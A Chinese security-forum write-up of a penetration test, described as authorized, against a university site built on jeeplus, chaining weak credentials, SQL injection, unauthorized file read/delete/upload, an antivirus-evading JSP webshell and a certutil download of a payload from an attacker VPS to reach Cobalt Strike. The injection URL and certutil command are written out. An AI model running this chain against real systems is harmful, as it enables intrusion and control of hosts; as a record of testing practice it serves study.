问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
记一次曲折的获取权限
渗透测试
碰到了一个对外宣传是否安全的站点,但实际测试下来并不安全。不过在这次获取权限的过程中还是有点曲折,记录下来并分享给大家。
0x01 前言 ======= 碰到了一个对外宣传是否安全的站点,但实际测试下来并不安全。不过在这次获取权限的过程中还是有点曲折,记录下来并分享给大家。 **整个测试过程均在授权的情况下完成,漏洞详细已经提交并通告相关知情。** 0x02 过程 ======= ### 1. 进入 <https://xxx.edu.cn/a/login> 使用弱口令进行登陆 ### 2. 寻找上传点 进来后找到一处文件上传的地方进行测试 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-a1900d25fe285c5f3c6dcd9f20529d79cdde1327.png) 前端对上传的文件类型做了初步校验,这里我们上传一个空文本后抓包 ![image-20220413194850530.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8bb9f490077bcd411941887ecf8ba087c249b0c4.png) 发现路径可以被操控,而且返回了绝对路径。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9a070687c8517f2d84b10a70b766047249e44f92.png) 尝试访问后发现不能被解析只能下载。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-37ea34648ac4e682f274e0a346c348f6f0ba9730.png) 再次寻找上传点,发现有头像上传的地方。这种上传点一般都能被解析。 ![image-20220413195538939.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-11d092d791c6f35a502a0b9127eed73e4b1dd46f.png) 上传正常图片 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-56fd22ec82136a411700184d97d48856c929302b.png) 返回了上传成功的提示,但没发现返回的地址。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-d174759875e2519a0f05efc537f3ee5baa01bef9.png) 而后在个人资料出发现了图片地址 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-f46f7da9be3332d7fb37a71922e43b89a6e0fd86.png) 我们再次尝试构造请求报文重发,这里直接将后缀改成 jsp 上传成功 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-b58ee336b6a9b56a1d73c86bf9d7f380f72dc85e.png) 刷新个人信息,找到访问链接。发现仍然是只能下载。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0b659487e65a5768d2bbf7134ddbeae969bc0990.png) ### 3.突破口 ![image-20220413200236737.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-1ccda93eead7bc2d02597ac69060b55fb66af0bf.png) 我在 Cookie 中发现 jeeplus 的字眼,尝试搜索 getshell 方法 ![image-20220413200321834.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8c00948d74341d8975768c4b190bd5aa8c1725a4.png) 发现早已有前辈做过代码审计。 #### 1)SQL注入 ```php /a/sys/register/registerUser?roleName=wangba&mobile=13300990099\*&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on ``` 更具已有的 poc 进行尝试 sqlmap 跑起来,`*`号的地方是注入点。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-5c52a0c6878ec99a5aef3522d805f62929852574.png) 通过 sqlmap 跑出来是 oracle 数据库。尝试一些查询和提权无果放弃。注意,oracle 注入的 sql shell 只能做查询语句。 ![image-20220413202358543.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0732e357cadde7616833b7b3e27e5b86ccb24b87.png) #### 2)文件管理 直接访问 <https://xxx.edu.cn/a/sys/file> 就能越权进入到文件管理页面 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-2ade239904b21f6d1de83356d3c5566031ac67ba.png) 这个目录下面的文件都只能下载,我们对这里的文件上传、删除、下载都做了测试。 ##### a. 任意文件读取 下载接口可以返回文件内容,存在任意文件读取。 ![image-20220413202831585.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-c2a71f26f54b8da644fcdcfbf61a72d8dce486d6.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-27eaa266c0c127b3536833b6f4916eb8b50d5eea.png) ##### b.任意文件删除 这里甚至可以直接删除文件夹 ![image-20220413203037016.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-4a7e85532d835a65db624ca82d81f9e26b78c9d6.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-eb9b1f5829428292ca0cfc7673fea3931f7acb5a.png) ##### c. 任意文件上传 ![image-20220413203146352.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-e5ef7d0efb56163c609ab798cafdaaaf56fee2c5.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-edcc7bdc0b67c94cbba6215b676c826fd45c1f96.png) 这里可以自定义上传路径,如果路径不存在则创建目录并上传。 #### 3)尝试上传文件到可解析目录 我第一时间想到上传到 static 目录,因为这个目录是可以被直接访问的。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8f1503726d052fe432de262b9d649e2bb8655a2e.png) 然后尝试访问仍然是 404。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3f1a3a02eaea40802d5d4174582c23192d3fba2f.png) 这里就是我没有找到真确的路径。想去官网直接下载源码,点击下载后回要求注册,注册之后也没有发现哪里有下载源码的地方。 ![image-20220414092738726.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3177b00a840310fa03e024de53e51a868323ab92.png) 没办法就去凌风云网盘搜了一下,发现存在历史的版本,我感觉差异应该不会那么大。 ![image-20220414092826967.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-7a024945aa20d193ff3080c5db8485c1c200377e.png) 挑了一个比较大文件的下载,解压后可以查看目录结构。 ![image-20220414093004440.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-c6e6441171ac50e60a2efe7b0f0e3b9164d43280.png) 看到有存放配置文件的地方,我想看看能不能通过读取配置来找到绝对路径。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-5b518d24e37a0fccf336bec8f9b2ed68c16859e4.png) 结果还是路径不对。一番尝试后无果,突然想起来站点的目录还没扫过,直接 dirsearch 来一波。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-56497b4eaa730bd3cc44df02986b83fcb88cf847.png) 当我看到扫出来 web.xml 这些配置文件我就知道有戏了。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0cacf44f92f8f43143fe9404d4f31204f5cd4f51.png) 在 web.xml 中没有发现东西,但是在 `conf/server.xml` 发现了站点的另一个路径,我觉得这就是前端访问的路径。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8f2db36ed602a38d95f8a2b8d1c8caeec32c7d1f.png) 通过任意文件接口尝试构造路径 `C:\tomcat\webapps\xxxx\WEB-INF\web.xml` 发现有内容返回说明我找对了路径,然后发现了 404.jsp 存放的路径,对比我们之前拿到的源码发现我们成功找对了路径——上传文件到 `webpage` 这个目录**绝对能解析**。 ![image-20220414094047472.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3cb17cb0832a2b8e0776d267e30ec17dca65e50f.png) 尝试直接上传 webshell。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0b96f9f3926805a1390183c3f2b5e1326f30e27f.png) 发现文件真实存在,但是没有返回东西,我用任意文件读取查看。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6a9c2c9c4cd173a957bdf8cbf698cfb013b816cd.png) #### 4)免杀绕过WD检测 发现可能存在waf,但我后面对waf做了识别发现是 apache generic,这个不至于拦截我传的。再用 nmap 对机器做识别发现是 window10,让我想起了被 windows Defender支配的恐惧,不过这里我们找个命令免杀马子上传即可,找了一番之后用了以前 hw 碰到的一个马子。 <https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/jsp/Runtime-reflect-cmd.jsp> ![image-20220414095017232.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-fbabc408cd1c78e1417a009c457bbfd1c2086185.png) #### 5)上线 CS 成功上传并执行命令,原本想通过 powershell 上线,但是尝试过不同的命令包括免杀命令都不行。 然后我通过远程下载我的面杀马子上线 CS `certutil -urlcache -split -f http://VPS/免杀马子.exe` ![image-20220414095202570.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-b954675e4422d54d9cd70351002bdc3bb3e00bc1.png) 成功上线。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-4578b7233d3fdf04844ffaf82837d5fe9ded1e1c.png) 代理出来之后进入桌面,发现果然开启了 WD ![image-20220414135106369.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-85e577073fbd4c931d63d76861310890a5996f9c.png) ~上机之后才知道,原来管理员把上传文件夹路径放到F盘,主体是C盘,估计就是怕内存不够吧。~ 0x03 总结 ======= 碰到没有思路的站点就做好信息收集扩大攻击面。指纹识别、端口扫描、路径扫描都是老生常谈的了,这次还结合了公网网盘信息泄露的点,不然我还得继续猜路径。还有一点需要注意的是,测试的前提是**取得相关授权**。
发表于 2022-04-25 09:44:46
阅读 ( 7516 )
分类:
WEB安全
5 推荐
收藏
3 条评论
星冥安全
2022-04-26 16:19
师傅 可以转载一下吗
请先
登录
后评论
jdr
2022-04-25 20:28
第一个上传,上传后文件名没有发生改变,其实就已经可以尝试../进行路径穿越,想办法传到tomcat的目录下。
请先
登录
后评论
星冥安全
2022-04-26 16:10
楼主 可以转载一下吗 表明出处
请先
登录
后评论
请先
登录
后评论
en0th
数码爱好者
9 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!